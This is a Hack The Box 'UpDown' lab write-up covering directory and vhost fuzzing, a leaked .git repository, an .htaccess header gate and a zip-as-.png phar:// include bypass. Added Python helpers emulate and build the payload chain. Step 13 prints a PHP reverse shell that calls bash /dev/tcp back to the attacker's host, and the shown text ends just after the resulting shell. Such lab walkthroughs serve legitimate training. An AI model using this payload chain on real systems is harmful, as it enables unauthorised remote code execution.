UpDown-htb-writeup

0x00 Skills covered

Skills in this chapter: directory scanning, second-level directory scanning, virtual-host (subdomain) fuzzing, .git source-code leak, git_dumper.py, .htaccess configuration files, file-upload bypass, uploading a zip archive with a .png extension, phar://path includes, string analysis of a binary, code execution through Python 2's built-in input(), SSH key retrieval and login, sudo privilege escalation, easy_install privilege escalation

Reference: https://htbwp.readthedocs.io/en/latest/linux/UpDown.html

Reference: https://0xdf.gitlab.io/2023/01/21/htb-updown.html

0x01 Getting a user shell

1. Target IP: 10.10.11.177

2. Open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=2000 10.10.11.177 -oG allports -Pn
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 07:22 CST
Nmap scan report for 10.10.11.177
Host is up (0.10s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 40.22 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 -sC -sV --min-rate=2000 10.10.11.177 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-28 07:24 CST
Nmap scan report for 10.10.11.177
Host is up (0.10s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
| 256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_ 256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.36 seconds

3. Map the hostname in /etc/hosts and look at the default site on port 80

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.177 siteisup.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.177 siteisup.htb

http://10.10.11.177/

4. Directory brute force

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://10.10.11.177/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.10.11.177/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

# [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 105ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 105ms]
# [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 106ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 107ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 111ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 113ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 3450ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 3451ms]
# on at least 2 different hosts [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 6904ms]
# Priority ordered case-sensitive list, where entries were found [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 6910ms]
# [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 6907ms]
[Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 9721ms]
# [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 114ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 115ms]
dev [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 106ms]
[Status: 200, Size: 1131, Words: 186, Lines: 40, Duration: 107ms]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10, Duration: 107ms]
:: Progress: [220560/220560] :: Job [1/1] :: 232 req/sec :: Duration: [0:15:32] :: Errors: 132 ::

5. Two real hits: a dev directory (301) and server-status (403 when requested by IP, but it answers 200 when requested through the siteisup.htb hostname below). The lines starting with # are comment lines from the wordlist that ffuf sent as paths; they all return the 1131-byte index page, so `-ic` (ignore wordlist comments) or `-fs 1131` would have removed them. Look at each hit:

http://siteisup.htb/server-status

HTTP/1.1 200 OK
Date: Sat, 27 Apr 2024 15:51:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Transfer-Encoding: chunked
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for siteisup.htb (via 127.0.2.1)</h1>

<dl><dt>Server Version: Apache/2.4.41 (Ubuntu)</dt>
<dt>Server MPM: prefork</dt>
<dt>Server Built: 2022-06-14T13:30:55
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 27-Apr-2024 15:51:39 UTC</dt>
<dt>Restart Time: Saturday, 27-Apr-2024 15:15:58 UTC</dt>
<dt>Parent Server Config. Generation: 1</dt>
<dt>Parent Server MPM Generation: 0</dt>
<dt>Server uptime: 35 minutes 40 seconds</dt>
<dt>Server load: 0.75 1.07 0.54</dt>
<dt>Total accesses: 254074 - Total Traffic: 135.3 MB - Total Duration: 628543</dt>
<dt>CPU Usage: u3.92 s3.76 cu11.11 cs9.73 - 1.33% CPU load</dt>
<dt>119 requests/sec - 64.7 kB/second - 558 B/request - 2.47386 ms/request</dt>
<dt>54 requests currently being processed, 6 idle workers</dt>
</dl><pre>KK.KKK_KKKKKKKWKKKKKKKKKKKKKKKKKKKKKKK_KKKKKK.KKKK__KKK..K..._.W
K....K._.K......................................................
......................</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process<br />
</p>


<table border="0"><tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU
</th><th>SS</th><th>Req</th><th>Dur</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>Protocol</th><th>VHost</th><th>Request</th></tr>

<tr><td><b>3-0</b></td><td>1375</td><td>32/1018/7730</td><td><b>K</b>
</td><td>0.10</td><td>0</td><td>0</td><td>14338</td><td>17.1</td><td>0.53</td><td>4.16
</td><td>10.10.14.39</td><td>http/1.1</td><td nowrap>localhost:80</td><td nowrap>GET /20070113 HTTP/1.1</td></tr>

<tr><td><b>4-0</b></td><td>1356</td><td>30/1280/4673</td><td><b>K</b>
</td><td>0.12</td><td>0</td><td>0</td><td>10005</td><td>16.1</td><td>0.67</td><td>2.47
</td><td>10.10.14.39</td><td>http/1.1</td><td nowrap>localhost:80</td><td nowrap>GET /goldmedalPlea HTTP/1.1</td></tr>

<tr><td><b>80-0</b></td><td>-</td><td>0/0/1</td><td>.
</td><td>0.00</td><td>487</td><td>0</td><td>0</td><td>0.0</td><td>0.00</td><td>0.00
</td><td>::1</td><td>http/1.1</td><td nowrap>localhost:80</td><td nowrap>OPTIONS * HTTP/1.0</td></tr>

</table>
<hr /> <table>
<tr><th>Srv</th><td>Child Server number - generation</td></tr>
<tr><th>PID</th><td>OS process ID</td></tr>
<tr><th>Acc</th><td>Number of accesses this connection / this child / this slot</td></tr>
<tr><th>M</th><td>Mode of operation</td></tr>
<tr><th>CPU</th><td>CPU usage, number of seconds</td></tr>
<tr><th>SS</th><td>Seconds since beginning of most recent request</td></tr>
<tr><th>Req</th><td>Milliseconds required to process most recent request</td></tr>
<tr><th>Dur</th><td>Sum of milliseconds required to process all requests</td></tr>
<tr><th>Conn</th><td>Kilobytes transferred this connection</td></tr>
<tr><th>Child</th><td>Megabytes transferred this child</td></tr>
<tr><th>Slot</th><td>Total megabytes transferred this slot</td></tr>
</table>
<hr />
<address>Apache/2.4.41 (Ubuntu) Server at siteisup.htb Port 80</address>
</body></html>

┌──(kali㉿offsec)-[~/Desktop]
└─$ dirsearch -u http://10.10.11.177/dev/

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/Desktop/reports/http_10.10.11.177/_dev__24-04-28_08-13-20.txt

Target: http://10.10.11.177/

[08:13:20] Starting: dev/
[08:13:25] 301 - 315B - /dev/.git -> http://10.10.11.177/dev/.git/
[08:13:25] 200 - 413B - /dev/.git/branches/
[08:13:25] 200 - 602B - /dev/.git/
[08:13:25] 200 - 73B - /dev/.git/description
[08:13:25] 200 - 298B - /dev/.git/config
[08:13:25] 200 - 21B - /dev/.git/HEAD
[08:13:25] 200 - 675B - /dev/.git/hooks/
[08:13:25] 200 - 521B - /dev/.git/index
[08:13:25] 200 - 459B - /dev/.git/info/
[08:13:25] 200 - 240B - /dev/.git/info/exclude
[08:13:25] 200 - 483B - /dev/.git/logs/
[08:13:25] 301 - 325B - /dev/.git/logs/refs -> http://10.10.11.177/dev/.git/logs/refs/
[08:13:25] 200 - 179B - /dev/.git/logs/HEAD
[08:13:25] 301 - 331B - /dev/.git/logs/refs/heads -> http://10.10.11.177/dev/.git/logs/refs/heads/
[08:13:25] 301 - 333B - /dev/.git/logs/refs/remotes -> http://10.10.11.177/dev/.git/logs/refs/remotes/
[08:13:25] 301 - 340B - /dev/.git/logs/refs/remotes/origin -> http://10.10.11.177/dev/.git/logs/refs/remotes/origin/
[08:13:25] 200 - 179B - /dev/.git/logs/refs/remotes/origin/HEAD
[08:13:25] 200 - 466B - /dev/.git/objects/
[08:13:25] 200 - 112B - /dev/.git/packed-refs
[08:13:25] 301 - 326B - /dev/.git/refs/heads -> http://10.10.11.177/dev/.git/refs/heads/
[08:13:25] 200 - 473B - /dev/.git/refs/
[08:13:25] 301 - 328B - /dev/.git/refs/remotes -> http://10.10.11.177/dev/.git/refs/remotes/
[08:13:25] 301 - 335B - /dev/.git/refs/remotes/origin -> http://10.10.11.177/dev/.git/refs/remotes/origin/
[08:13:25] 200 - 30B - /dev/.git/refs/remotes/origin/HEAD
[08:13:25] 301 - 325B - /dev/.git/refs/tags -> http://10.10.11.177/dev/.git/refs/tags/
[08:13:25] 403 - 277B - /dev/.ht_wsr.txt
[08:13:25] 403 - 277B - /dev/.htaccess.bak1
[08:13:25] 403 - 277B - /dev/.htaccess.save
[08:13:25] 403 - 277B - /dev/.htaccess.sample
[08:13:25] 403 - 277B - /dev/.htaccess.orig
[08:13:25] 403 - 277B - /dev/.htaccess_extra
[08:13:25] 403 - 277B - /dev/.htaccess_orig
[08:13:25] 403 - 277B - /dev/.htaccess_sc
[08:13:25] 403 - 277B - /dev/.htaccessBAK
[08:13:25] 403 - 277B - /dev/.htaccessOLD
[08:13:25] 403 - 277B - /dev/.htaccessOLD2
[08:13:25] 403 - 277B - /dev/.html
[08:13:25] 403 - 277B - /dev/.htm
[08:13:25] 403 - 277B - /dev/.htpasswds
[08:13:25] 403 - 277B - /dev/.httr-oauth
[08:13:26] 403 - 277B - /dev/.htpasswd_test
[08:13:27] 403 - 277B - /dev/.php

Task Completed

http://10.10.11.177/dev/

http://10.10.11.177/dev/.git/

6. Before digging into .git, enumerate virtual hosts by fuzzing the Host header. Filtering out the 1131-byte default response leaves a single hit, dev, which answers 403:

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://siteisup.htb -H 'Host: FUZZ.siteisup.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -fs 1131

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://siteisup.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.siteisup.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1131
________________________________________________

dev [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 4558ms]
:: Progress: [19966/19966] :: Job [1/1] :: 188 req/sec :: Duration: [0:01:31] :: Errors: 0 ::


┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.177 dev.siteisup.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.177 dev.siteisup.htb

http://dev.siteisup.htb/

7. I first used gitdumper.sh, but it fetched an incomplete copy of the repository, which left me stuck: I went through the whole directory without finding what I was after. Only after checking a writeup did I realise the .git download was incomplete, so I switched to git_dumper.py and started over:

┌──(kali㉿offsec)-[~/Desktop/git-dumper-py]
└─$ python3 git_dumper.py http://10.10.11.177/dev/.git ./temp
[-] Testing http://10.10.11.177/dev/.git/HEAD [200]
[-] Testing http://10.10.11.177/dev/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.11.177/dev/.git/ [200]
[-] Fetching http://10.10.11.177/dev/.gitignore [404]
[-] http://10.10.11.177/dev/.gitignore responded with status code 404
[-] Fetching http://10.10.11.177/dev/.git/packed-refs [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/ [200]
[-] Fetching http://10.10.11.177/dev/.git/branches/ [200]
[-] Fetching http://10.10.11.177/dev/.git/config [200]
[-] Fetching http://10.10.11.177/dev/.git/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/ [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/fsmonitor-watchman.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/post-update.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/commit-msg.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-commit.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-merge-commit.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-receive.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/pre-push.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/ [200]
[-] Fetching http://10.10.11.177/dev/.git/info/ [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/heads/ [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/update.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/hooks/push-to-checkout.sample [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/remotes/ [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/tags/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/ [200]
[-] Fetching http://10.10.11.177/dev/.git/info/exclude [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/heads/main [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/remotes/origin/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/heads/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/remotes/ [200]
[-] Fetching http://10.10.11.177/dev/.git/refs/remotes/origin/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/remotes/origin/ [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/heads/main [200]
[-] Fetching http://10.10.11.177/dev/.git/logs/refs/remotes/origin/HEAD [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/ [200]
[-] Fetching http://10.10.11.177/dev/.git/description [200]
[-] Fetching http://10.10.11.177/dev/.git/index [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/info/ [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/pack/ [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.pack [200]
[-] Fetching http://10.10.11.177/dev/.git/objects/pack/pack-30e4e40cb7b0c696d1ce3a83a6725267d45715da.idx [200]
[-] Sanitizing .git/config
[-] Running git checkout .
Updated 6 paths from the index
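Before dumping a whole repository it is worth reading the .git/index that dirsearch reported (521 B): it lists every tracked path and ends with a SHA-1 over its own contents, so a truncated fetch, the problem that cost time with gitdumper.sh above, is detected immediately instead of after a long search. The parser below is an added example and is not part of the writeup or of git_dumper; build_index only constructs test data and writes a bare version-2 index. Assuming version 2, six entries with the six file names recovered in step 8 come to 488 bytes, and a TREE cache extension would account for the remaining 33 bytes of 521.

```python
import hashlib
import struct

ENTRY_FIXED = 62  # bytes of metadata before the path in an index v2 entry


def build_index(paths):
    """Construct a minimal git index (version 2) for the given paths.
    Test data only: real indexes also carry timestamps, inode data and blob hashes."""
    body = b"DIRC" + struct.pack(">II", 2, len(paths))
    for path in sorted(paths):  # git keeps entries sorted by path bytes
        name = path.encode()
        fixed = struct.pack(">10I", 0, 0, 0, 0, 0, 0, 0o100644, 0, 0, 0)  # ctime..size
        entry = fixed + b"\x00" * 20 + struct.pack(">H", min(len(name), 0xFFF)) + name
        entry += b"\x00" * (8 - len(entry) % 8)  # NUL-terminate and pad to a multiple of 8
        body += entry
    return body + hashlib.sha1(body).digest()  # trailing checksum over everything before it


def parse_index(data):
    """List tracked paths (with mode, size and blob id) from a raw .git/index."""
    if len(data) < 32 or data[:4] != b"DIRC":
        raise ValueError("not a git index")
    version, count = struct.unpack(">II", data[4:12])
    if version != 2:
        raise ValueError(f"index version {version} not handled here")
    if hashlib.sha1(data[:-20]).digest() != data[-20:]:
        raise ValueError("checksum mismatch: truncated or corrupted download")
    entries, off = [], 12
    for _ in range(count):
        mode, = struct.unpack(">I", data[off + 24:off + 28])
        size, = struct.unpack(">I", data[off + 36:off + 40])
        blob = data[off + 40:off + 60].hex()
        flags, = struct.unpack(">H", data[off + 60:off + 62])
        namelen = flags & 0x0FFF
        start = off + ENTRY_FIXED
        if namelen < 0x0FFF:
            name = data[start:start + namelen]
        else:  # very long path: the length field is saturated, scan to the NUL
            name = data[start:data.index(b"\x00", start)]
            namelen = len(name)
        entries.append({"path": name.decode(), "mode": mode, "size": size, "blob": blob})
        off += (ENTRY_FIXED + namelen + 8) & ~7  # git's padding rule for v2 entries
    return entries


def index_is_complete(data):
    """True when the index parses and its checksum verifies."""
    try:
        parse_index(data)
    except ValueError:
        return False
    return True


SENSITIVE = (".htaccess", ".htpasswd", ".env", "config", "id_rsa", ".sql", "backup")


def sensitive_paths(entries):
    """Paths worth pulling first once the repository is dumped."""
    return [e["path"] for e in entries if any(s in e["path"].lower() for s in SENSITIVE)]


if __name__ == "__main__":
    with open("temp/.git/index", "rb") as fh:  # path from the git_dumper run above
        raw = fh.read()
    for e in parse_index(raw):
        print(f"{e['mode']:o} {e['blob'][:12]} {e['size']:>6} {e['path']}")
```

Run it against the fetched index before and after a dump; a checksum failure means the server truncated the file or a tool stopped early, and the path list tells you whether the repository is worth recovering at all.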

8. Review the recovered files

┌──(kali㉿offsec)-[~/Desktop/git-dumper-py/temp]
└─$ ls -la
total 40
drwxr-xr-x 3 kali kali 4096 Apr 28 22:26 .
drwxrwxr-x 3 kali kali 4096 Apr 28 22:26 ..
-rw-r--r-- 1 kali kali 59 Apr 28 22:26 admin.php
-rw-r--r-- 1 kali kali 147 Apr 28 22:26 changelog.txt
-rw-r--r-- 1 kali kali 3145 Apr 28 22:26 checker.php
drwxr-xr-x 7 kali kali 4096 Apr 28 22:26 .git
-rw-r--r-- 1 kali kali 117 Apr 28 22:26 .htaccess
-rw-r--r-- 1 kali kali 273 Apr 28 22:26 index.php
-rw-r--r-- 1 kali kali 5531 Apr 28 22:26 stylesheet.css

┌──(kali㉿offsec)-[~/Desktop/git-dumper-py/temp]
└─$ cat .htaccess
SetEnvIfNoCase Special-Dev "only4dev" Required-Header
Order Deny,Allow
Deny from All
Allow from env=Required-Header

In plain terms: SetEnvIfNoCase sets the environment variable Required-Header when the request carries a header named Special-Dev whose value matches the case-insensitive pattern "only4dev". With Order Deny,Allow, the Deny from All is then overridden by Allow from env=Required-Header. Every request without that header gets a 403, which is exactly what the dev vhost returned above.

Header to add: Special-Dev: only4dev

9. So a request that carries the header Special-Dev: only4dev gets through. Combined with the dev vhost found above (403 without it), try it there:

http://dev.siteisup.htb/
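An added Python example (not code from the writeup or from the box) that emulates how Apache evaluates that .htaccess and then sends the probe request. SetEnvIfNoCase compiles "only4dev" as a case-insensitive regex and searches the header value, so any value containing that string sets Required-Header, and with Order Deny,Allow the Allow overrides Deny from All. The target URL is the dev vhost found above; the network probe runs only when the file is executed as a script.

```python
import re
import urllib.error
import urllib.request

# Rules from the .htaccess recovered out of /dev/.git (mod_access_compat syntax):
#   SetEnvIfNoCase Special-Dev "only4dev" Required-Header
#   Order Deny,Allow
#   Deny from All
#   Allow from env=Required-Header
HEADER_NAME = "Special-Dev"
# SetEnvIfNoCase treats the value as a case-insensitive regex and searches the
# header value; it is not an exact comparison, so the pattern is effectively unanchored.
HEADER_RE = re.compile(r"only4dev", re.IGNORECASE)


def apache_allows(headers):
    """Emulate the Deny,Allow decision for one request's header dict.

    Order Deny,Allow: Deny rules are evaluated first (here: everything), then Allow
    rules may override; the request gets through only when the env var was set.
    HTTP header names are case-insensitive, so the name is matched that way too.
    """
    for name, value in headers.items():
        if name.lower() == HEADER_NAME.lower() and HEADER_RE.search(value):
            return True
    return False


def curl_command(url, value="only4dev"):
    """The one-liner for manual testing (in Burp: Proxy > Match and Replace adds it to every request)."""
    return f"curl -si -H '{HEADER_NAME}: {value}' '{url}'"


def probe(url, value="only4dev", timeout=5):
    """Send a real request carrying the header and return the HTTP status code."""
    req = urllib.request.Request(url, headers={HEADER_NAME: value})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


if __name__ == "__main__":
    target = "http://dev.siteisup.htb/"  # vhost from the Host-header fuzzing above
    print(curl_command(target))
    print("wrong header value:", probe(target, value="nope"))  # expect 403
    print("correct header:    ", probe(target))                # expect 200
```

Because the match is a substring search, a value such as "x-only4dev-build" also passes; a stricter gate would anchor the pattern ("^only4dev$") or, better, not rely on a static client-supplied header at all.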

10. The dev vhost has a file-upload page. The source recovered from .git shows why it is exploitable: checker.php rejects uploads by an extension blocklist only (php, phtml, zip, ...) and never inspects the content, while index.php does include($_GET['page'] . ".php") behind a weak substring filter. A zip archive renamed to .png therefore passes the upload check, and the phar:// stream wrapper lets include() read a PHP file from inside that archive:

# checker.php (excerpt recovered from .git): the upload handler
if($_POST['check']){

    # File size must be less than 10kb.
    if ($_FILES['file']['size'] > 10000) {
        die("File too large!");
    }
    $file = $_FILES['file']['name'];

    # Check if extension is allowed.
    $ext = getExtension($file);
    if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){
        die("Extension not allowed!");
    }

    # Create directory to upload our file.
    $dir = "uploads/".md5(time())."/";
    if(!is_dir($dir)){
        mkdir($dir, 0770, true);
    }


<!-- index.php (excerpt recovered from .git): the page include -->
<b>This is only for developers</b>
<br>
<a href="?page=admin">Admin Panel</a>
<?php
define("DIRECTACCESS",false);
$page=$_GET['page'];
if($page && !preg_match("/bin|usr|home|var|etc/i",$page)){
    include($_GET['page'] . ".php");
}else{
    include("checker.php");
}
?>

11. Build the archive and upload it

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat pipinfo.php
<?php phpinfo();?>

┌──(kali㉿offsec)-[~/Desktop]
└─$ zip pipinfo.png pipinfo.php
adding: pipinfo.php (deflated 6%)

http://dev.siteisup.htb/uploads/9df78c6c215ea04b53719ab74e46d47a/pipinfo.png

12. Execute the phpinfo inside the uploaded archive through the phar:// wrapper. Because index.php appends ".php", the inner file is referenced by its stem pipinfo, not pipinfo.php:

http://dev.siteisup.htb/?page=phar://uploads/9df78c6c215ea04b53719ab74e46d47a/pipinfo.png/pipinfo
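The whole chain of steps 10 to 12 as an added Python example; it is not part of the writeup or of the target's code. The two blocklists are copied from the recovered checker.php and index.php; the behaviour of getExtension() (everything after the last dot) is an assumption, since that function's body was not recovered; the archive is built in memory; and the ?page= value follows from index.php appending ".php". A hardened allowlist-plus-magic-bytes check is shown beside the vulnerable one for contrast.

```python
import io
import re
import zipfile

# Blocklists copied from the source recovered out of /dev/.git.
UPLOAD_BLOCKLIST = re.compile(r"php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar", re.IGNORECASE)  # checker.php
PAGE_BLOCKLIST = re.compile(r"bin|usr|home|var|etc", re.IGNORECASE)  # index.php
MAX_UPLOAD = 10000  # bytes, from checker.php


def get_extension(filename):
    """Assumption: checker.php's getExtension() returns the text after the last dot."""
    return filename.rsplit(".", 1)[1] if "." in filename else ""


def upload_allowed(filename, size):
    """Mirror checker.php: size cap, then an extension blocklist. Content is never inspected."""
    if size > MAX_UPLOAD:
        return False, "File too large!"
    if UPLOAD_BLOCKLIST.search(get_extension(filename)):
        return False, "Extension not allowed!"
    return True, "ok"


def page_allowed(page):
    """Mirror index.php: include($page . '.php') runs unless the substring filter matches."""
    return bool(page) and not PAGE_BLOCKLIST.search(page)


def build_zip_payload(inner_name, php_source):
    """Zip one PHP file in memory. Uploaded under a .png name it passes upload_allowed(),
    and a zip is exactly what the phar:// wrapper knows how to open."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(inner_name, php_source)
    return buf.getvalue()


def zip_names(data):
    """Names inside the archive (the paths phar:// will see below the .png)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def phar_page_value(upload_dir, png_name, inner_name):
    """Value for ?page=: index.php appends '.php', so reference the inner file by its stem."""
    stem = inner_name[:-4] if inner_name.endswith(".php") else inner_name
    return f"phar://{upload_dir}/{png_name}/{stem}"


# Hardened variant: an allowlist of image types plus a magic-byte check on the content.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def hardened_upload_allowed(filename, data):
    """Accept only allowlisted extensions whose bytes start with the matching signature."""
    magic = IMAGE_MAGIC.get(get_extension(filename).lower())
    return magic is not None and data.startswith(magic) and len(data) <= MAX_UPLOAD


if __name__ == "__main__":
    payload = build_zip_payload("shell.php", "<?php phpinfo(); ?>")
    with open("shell.png", "wb") as fh:
        fh.write(payload)
    print(upload_allowed("shell.png", len(payload)))
    # upload dir is md5(time()) on the server; read it from the response after uploading
    print(phar_page_value("uploads/<md5-of-upload-time>", "shell.png", "shell.php"))
```

The hardened check rejects the renamed archive because it starts with PK\x03\x04 rather than the PNG signature. It is necessary but not sufficient: a genuine PNG with a zip appended can still be opened by the phar:// wrapper, which locates the archive from its end-of-central-directory record, so the durable fix is in index.php, replacing include() of user input with an allowlist of page names.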

13. Next, build a reverse-shell payload and upload it the same way. proc_open() is used here instead of system()/exec(); check the disable_functions entry in the phpinfo output from step 12 to see which execution functions the target blocks before choosing one:

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat shell.php
<?php
$proc=proc_open("bash -c 'bash -i >&/dev/tcp/10.10.14.39/443 0>&1'",
array(
array("pipe","r"),
array("pipe","w"),
array("pipe","w")
),
$pipes);
print stream_get_contents($pipes[1]);
?>

┌──(kali㉿offsec)-[~/Desktop]
└─$ zip shell.png shell.php
adding: shell.php (deflated 33%)

http://dev.siteisup.htb/uploads/7c6eba507d508a9a10bf42e63a81cef8/shell.png

http://dev.siteisup.htb/?page=phar://uploads/7c6eba507d508a9a10bf42e63a81cef8/shell.png/shell

14. Initial shell as www-data:

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.11.177] 52472
bash: cannot set terminal process group (909): Inappropriate ioctl for device
bash: no job control in this shell
www-data@updown:/var/www/dev$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@updown:/var/www/dev$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Jun 22 2022 .
